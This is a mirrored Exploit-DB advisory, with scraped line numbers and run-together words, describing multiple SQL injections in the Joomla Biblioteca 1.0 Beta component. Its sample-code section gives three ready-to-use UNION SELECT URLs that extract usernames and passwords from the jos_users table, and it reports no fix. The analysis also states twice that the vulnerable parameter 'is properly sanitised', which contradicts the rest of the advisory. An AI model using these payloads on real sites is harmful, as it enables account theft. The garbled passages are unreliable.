Joomla! Component Biblioteca 1.0 Beta – Multiple SQL Injections - 体验盒子

作者： Salvatore Fresta

日期： 2010-08-21

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/14703/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

Biblioteca 1.0 Beta Joomla Component Multiple SQL Injection Vulnerabilities

NameBiblioteca

Vendorhttp://www.cielostellato.info

Versions Affected 1.0 Beta

AuthorSalvatore Fresta aka Drosophila

Website http://www.salvatorefresta.net

Contact salvatorefresta [at] gmail [dot] com

Date2010-08-21

X. INDEX

I.ABOUT THE APPLICATION

II. DESCRIPTION

III.ANALYSIS

IV. SAMPLE CODE

V.FIX

I. ABOUT THE APPLICATION

________________________

Componentthatallowsthe automaticmanagementof a

libraryinelectronic format. It' can manage books and

theirloansthrough an attractivegraphicaluser

interface simple and usable.

II. DESCRIPTION

_______________

This component doesn't use the common Joomla's functions

togetthe parameters's value from GET, POST etc.. and

allofthesearenot properly sanitised before being

used in SQL queries.

III. ANALYSIS

_____________

Summary:

A) Multiple Blind SQL Injection

B) Multiple SQL Injection

A) Multiple Blind SQL Injection

_______________________________

Theparametertestopassedtobi.php (site and admin

frontends)isproperly sanitised before being used in a

SQL query.This can be exploited to manipulate SQL queries

by injecting arbitrary SQL code.

B) Multiple SQL Injection

_________________________

Theparameter testopassedtostampa.php, pdf.php and

models/biblioteca.php (when "view" is set to "biblioteca"

) isproperly sanitised before being used in SQL queries.

Thiscanbeexploited tomanipulateSQLqueriesby

injecting arbitrary SQL code.

IV. SAMPLE CODE

_______________

A) Multiple SQL Injection

http://host/path/components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23

http://host/path/components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23

http://host/path/index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23

V. FIX

______

No fix.